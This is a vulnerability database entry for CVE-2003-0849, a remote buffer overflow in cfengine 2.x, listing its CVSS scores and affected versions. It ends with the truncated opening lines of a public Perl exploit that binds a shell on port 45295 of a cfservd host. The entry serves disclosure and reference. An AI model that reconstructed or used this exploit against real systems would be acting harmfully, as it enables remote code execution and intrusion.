CVE-2003-0849

Published: 17/11/2003 Updated: 18/10/2016
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 765
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in net.c for cfengine 2.x prior to 2.0.8 allows remote malicious users to execute arbitrary code via certain packets with modified length values, which are trusted by the ReceiveTransaction function when using a buffer provided by the BusyWithConnection function.

Vulnerable Product

gnu cfengine 2.0.0

gnu cfengine 2.0.5

gnu cfengine 2.1.0

gnu cfengine 2.0.1

gnu cfengine 2.0.2

gnu cfengine 2.0.6

gnu cfengine 2.0.7

gnu cfengine 2.0.3

gnu cfengine 2.0.4

Exploits

source: www.securityfocus.com/bid/8699/info. cfengine is prone to a stack-based buffer overrun vulnerability. This issue may be exploited by remote attackers who can send malicious transaction packets to cfservd. This issue is due to insufficient bounds checking of data that is read in during a transaction with a remote user. The vulnerabil ...
    #!/usr/bin/perl -s
    # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003
    # forking portbind shellcode port=0xb0ef(45295) by eSDee
    # bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE
    use IO::Socket;
    if(!$ARGV[1])
    { print "usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\n"; exit(-1); }
    $hos ...